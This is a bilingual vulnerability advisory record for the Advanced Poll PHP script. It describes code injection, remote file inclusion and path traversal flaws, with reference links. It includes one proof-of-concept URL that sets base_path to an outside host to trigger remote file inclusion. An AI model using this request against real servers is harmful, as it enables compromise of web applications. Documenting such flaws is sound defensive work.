Advanced Poll PHP多个安全漏洞

https://www.exploit-db.com/exploits/28253
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200312-241

AdvancedPoll是一款基于PHP的投票程序。AdvancedPoll由于不正确处理用户提交输入，远程攻击者可以利用这些漏洞获得敏感信息，包含远程PHP文件，或者执行PHP代码。AdvancedPoll包含的comments.php脚本对用户提交给'id'或'template_set'或'action'的变量缺少充分过滤，提交恶意PHP代码可导致以WEB权限执行。'admin/common.inc.php'脚本对用户提交的'basepath'变量缺少充分过滤，包含远程服务器上的任意文件，可导致以WEB权限执行任意命令。此脚本对&pollvars[lang]参数也没有正确过滤，提交包含多个'../'的数据可以WEB权限查看系统任意文件内容。

source: http://www.securityfocus.com/bid/19105/info

Advanced Poll is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input to the application.

An attacker may leverage this issue to have an arbitrary remote file containing malicious script code execute in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system. Other attacks are also possible.

Version 2.02 is reported vulnerable; other versions may also be affected.

http://www.example.com/[path_advanced_poll]/admin/common.inc.php?base_path=http:www.example.com

来源:SECUNIA
名称:10068
链接:http://secunia.com/advisories/10068
来源:XF
名称:advancedpoll-php-file-include(13514)
链接:http://xforce.iss.net/xforce/xfdb/13514
来源:www.solpotcrew.org
链接:http://www.solpotcrew.org/adv/solpot-adv-02.txt
来源:BID
名称:8890
链接:http://www.securityfocus.com/bid/8890
来源:BID
名称:19105
链接:http://www.securityfocus.com/bid/19105
来源:BUGTRAQ
名称:20060721SolpotCrewAdvisory#2-AdvancedPollver2.02(base_path)RemoteFileInclusion
链接:http://www.securityfocus.com/archive/1/archive/1/440780/100/0/threaded
来源:BUGTRAQ
名称:20031025AdvancedPoll:PHPCodeInjection,FileInclude,Phpinfo
链接:http://www.securityfocus.com/archive/1/342493
来源:www.phpsecure.info
链接:http://www.phpsecure.info/v2/tutos/frog/AdvancedPoll2.0.2.txt
来源:OSVDB
名称:3291
链接:http://www.osvdb.org/3291
来源:OSVDB
名称:28988
链接:http://www.osvdb.org/28988
来源：NSFOCUS
名称：5581※9068
链接：http://www.nsfocus.net/vulndb/5581※9068